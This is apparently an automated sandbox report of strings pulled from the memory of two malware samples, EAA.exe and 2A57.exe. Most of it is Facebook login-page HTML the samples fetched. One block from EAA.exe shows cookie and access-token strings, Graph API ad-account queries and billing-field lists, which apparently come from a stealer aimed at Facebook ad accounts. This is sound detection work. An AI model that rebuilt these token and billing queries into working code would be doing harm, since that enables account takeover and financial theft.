name="had_cp_prefilled" value="false" /><input type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled" value="false" /><input type="hidden" autocomplete="off" name="ab_test_data" value="" /></form><script nonce="3nHgiaRw">window.ge||(window.ge=function(a){return document.getElementById(a)});window.onload=function(a){return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=new RegExp(a+"=(.*?)(;|$)");return a.test(document.cookie)?RegExp.$1:null}b("c_user")&&!window.__cancelCookieReload&&(window.clearInterval(window.__cookieReload),window.location=a)}function begin_polling_login_cookies(a){window.__cookieReload=window.setInterval(function(){reload_on_new_cookie(a)},5e3),window.__cancelCookieReload=!1,window.addEventListener("beforeunload",function(){window.__cancelCookieReload=!0})}</script></div></div></div></div><div class=""><div class="_95ke _8opy"><div id="pageFooter" 
data-referrer="page_footer" data-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_US&quot;, &quot;https:\/\/de-de.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 0); return false;" title="German">Deutsch</a></li><li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 1);
Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: </span><a href="/r.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;locale=en_US&amp;display=page" rel="nofollow" class="_97w5">Sign up for Facebook</a></div></div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" /><input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false" /><input type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled" value="false" /><input type="hidden" autocomplete="off" name="ab_test_data" value="" /></form><script nonce="tBkKtFtO">window.ge||(window.ge=function(a){return document.getElementById(a)});window.onload=function(a){return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=new RegExp(a+"=(.*?)(;|$)");return a.test(document.cookie)?RegExp.$1:null}b("c_user")&&!window.__cancelCookieReload&&(window.clearInterval(window.__cookieReload),window.location=a)}function begin_polling_login_cookies(a){window.__cookieReload=window.setInterval(function(){reload_on_new_cookie(a)},5e3),window.__cancelCookieReload=!1,window.addEventListener("beforeunload",function(){window.__cancelCookieReload=!0})}</script></div></div></div></div><div class=""><div class="_95ke _8opy"><div id="pageFooter" 
data-referrer="page_footer" data-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_US&quot;, &quot;https:\/\/de-de.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 0); return false;" title="German">Deutsch</a></li><li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 1);
Source: EAA.exe, 0000000C.00000002.647023897.0000000002432000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647141442.0000000002434000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comX equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com] equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.come= equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.566047879.0000000000812000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comz equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_ot1t5YjYL3s sx_2cfa7d"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT2KDX0_xm5tHV6EtlZy1FVE0SRsncVSt4wGO4MCE2w-J6mfa5CkrpsucEDN45BdGpUG6pvEEJ0XcbRs-p9DYP6KN7DqzC6p9a4h2C8Vro8p34ncbvS8ojItgeHFEqHcfX2tkK0p_WNDBF-YGO4Xwg" title="Check out Instagram" target="_blank" rel="noopener nofollow" 
data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bulletin</a></li><li><a href="/local/lists/245019872666104/" title="Browse our Local Lists directory.">Local</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/groups/explore/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.facebook.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></li><li><a href="/pages/create/?ref_type=site_footer" title="Create a page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="
Source: 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_ot1t5YjYL3s sx_2cfa7d"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT3Fx88AL6YXuc7T7uUsDzkJgrNPVa0SWpimF2Ojh5NZn7SMI-C2M0DnriCHxYRxQ2xunOCmUGhC44W06kRKaPYgmDmRXQXr11GceZLamN8hWG5MX9-pBtk1QwNhuycywaFJ21XuahAHBf2Pg5QDSA" title="Check out Instagram" target="_blank" rel="noopener nofollow" 
data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bulletin</a></li><li><a href="/local/lists/245019872666104/" title="Browse our Local Lists directory.">Local</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/groups/explore/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.facebook.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></li><li><a href="/pages/create/?ref_type=site_footer" title="Create a page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648461867.0000000002480000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648461867.0000000002480000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing8( equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing[ equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingt equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648586287.0000000002489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 4 /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing_used,form_data,display_name,icon_url,federation_url,skip_z equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 4]www.facebook.comHTEP equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: :false});</script><script nonce="3nHgiaRw">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="3nHgiaRw"></style><script nonce="3nHgiaRw">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" / equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: </a></li><li><a class="_sv4" dir="ltr" href="https://hi-in.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;hi_IN&quot;, &quot;en_US&quot;, &quot;https:\/\/hi-in.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 8); return false;" title="Hindi"> equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: </a></li><li><a class="_sv4" dir="ltr" href="https://zh-cn.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;zh_CN&quot;, &quot;en_US&quot;, &quot;https:\/\/zh-cn.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Simplified Chinese (China)"> equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: <Unknown exceptionbad array new lengthstring too longmap/set too longoottpokmummoomymtetgnotsafecodea93i2ggcocodecamtheeeedvgggkuah34g34lnstalisiiduhqarg22223wdn_prc_useMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36bfceice-based/login/in/dev/log"="t""jazoeslsd"id""u=urce""sot=oesjaz&lsdd=&uice=ur&soxt=&ne-based/login/blogin/device_usersonokieJcoonieJscookunt_billingccount_settings/accofcebads/manager/a_token:cessactID:un{accogettIdounaccers=false&method=get&pretty=0&suppress_http_code=1_unpaid_unrepaid_invoice%22%2C%22has_repay_processing_invoices%22%5D&include_headed_market%22%2C%22current=%5B%22active_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22can_pay_now%22%2C%22can_repay_now%22%2C%22current_unbilled_spend%22%2C%22extended_credit_info%22%2C%22is_br_entity_account%22%2C%22has_extended_credit%22%2C%22max_billing_threshold%22%2C%22min_billing_threshold%22%2C%22min_payment%22%2C%22next_bill_date%22%2C%22pending_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22promotion_progress_bar_info%22%2C%22show_improved_boleto%22%2C%22business%7Bid%2Cname%2Cpayment_account_id%7D%22%2C%22total_prepay_balance%22%2C%22is_in_3ds_authorization_enablymentsAccountDataDispatcher&fields3.0/act_fb_uid?access_token=fb_access_token&_reqName=adaccount&_reqSrc=AdsCMPahttps://graph.facebook.com/v1b_uidfenccess_tokfb_ayInfopaoway_ncan_pnfopayIit=100&method=get&pretty=0&sort=name_ascending&suppress_http_code=1le_business%7Bid%2Cname%7D%22%2C%22name%22%5D&filtering=%5B%5D&include_headers=false&limatus%22%2C%22is_direct_deals_enabled%22%2C%22business%7Bid%2Cname%7D%22%2C%22viewabess_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataManager&fields=%5B%22account_id%2
2%2C%22account_sthttps://graph.facebook.com/v13.0/me/adaccounts?accs_tokencesfb_aciiiqqgataddatdataaccount_idssbusinet_settings&tab=account_billing_settingscount_id&pid=p1&business_id=fb_business_id&page=accounanager/account_settings/account_billing/?act=fb_achttps://business.facebook.com/ads/mnt_idfb_accousiness_idfb_buaccess_token:countIday_processing_invoices%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1unpaid_unrepaid_invoice%22%2C%22has_repotal_prepay_balance%22%2C%22is_in_3ds_authorization_enabled_market%22%2C%22current_ling_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22can_pay_now%22%2C%22can_repay_now%22%2C%22current_unbilled_spend%22%2C%22extended_credit_info%22%2C%22is_br_entity_account%22%2C%22has_extended_credit%22%2C%22max_billing_threshold%22%2C%22min_billing_threshold%22%2C%22min_payment%22%2C%22next_bill_date%22%2C%22pending_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22promotion_progress_bar_info%22%2C%22show_improved_boleto%22%2C%22business%7Bid%2Cname%2Cpayment_account_id%
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="3nHgiaRw">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_Sdvq_k","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMCPU","isCQuick":false});</script><script nonce="3nHgiaRw">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="3nHgiaRw"></style><script nonce="3nHgiaRw">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2FacceU equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="3nHgiaRw">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_Sdvq_k","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMCPU","isCQuick":false});</script><script nonce="3nHgiaRw">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="3nHgiaRw"></style><script nonce="3nHgiaRw">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="short equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="3nHgiaRw">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_Sdvq_k","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMCPU","isCQuick":false});</script><script nonce="3nHgiaRw">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="3nHgiaRw"></style><script nonce="3nHgiaRw">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yh/l/0,cross/Psnx7bG9mEY.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="JJDQYLd" crossorigin="anonymous" /> equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="M5pAlxU0">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_SdvGZk","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMJMk","isCQuick":false});</script><script nonce="M5pAlxU0">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="M5pAlxU0"></style><script nonce="M5pAlxU0">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/dat equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647322110.0000000002439000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tBkKtFtO">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_SdvtAs","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMqV8","isCQuick":false});</script><script nonce="tBkKtFtO">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tBkKtFtO"></style><script nonce="tBkKtFtO">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2FaccC equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tBkKtFtO">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_SdvtAs","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMqV8","isCQuick":false});</script><script nonce="tBkKtFtO">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tBkKtFtO"></style><script nonce="tBkKtFtO">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /3"; ma=86 equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tBkKtFtO">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_SdvtAs","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMqV8","isCQuick":false});</script><script nonce="tBkKtFtO">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tBkKtFtO"></style><script nonce="tBkKtFtO">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; 